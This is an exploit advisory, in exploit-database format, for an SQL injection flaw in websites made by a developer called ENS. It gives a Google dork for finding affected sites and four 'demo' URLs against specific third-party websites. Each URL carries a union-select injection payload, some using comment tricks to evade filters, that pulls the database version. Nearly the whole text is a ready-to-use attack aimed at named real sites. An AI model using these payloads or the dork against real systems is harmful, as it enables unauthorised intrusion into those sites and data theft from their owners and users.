*********************************************************
#Exploit Title: Designed & Developed by ENS Sql Injection Vulnerability
#Date: 2021-02-07
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: https://www.ensconsultants.com
#Google Dork: "Designed & Developed by ENS"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed & Developed by ENS"
### Demo :
http://www.autosaloncenter.com/products.php?cat_id=-5%27%20union%20select%201,version(),3,4,5,6,7--+
http://www.index-precast.com/projectmore.php?product_id=3%20&&%20product_cat_id=-1%27%20union%20select%201,2,version(),4,5,6,7,8,9,10,11--+
http://www.travazatools.com/products1.php?product_cat_id=-99%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7,8,9,10--+
http://ensdemos.com/Mrconsult/projectsdetails.php?id=-2%27%20/*!12345union*/%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************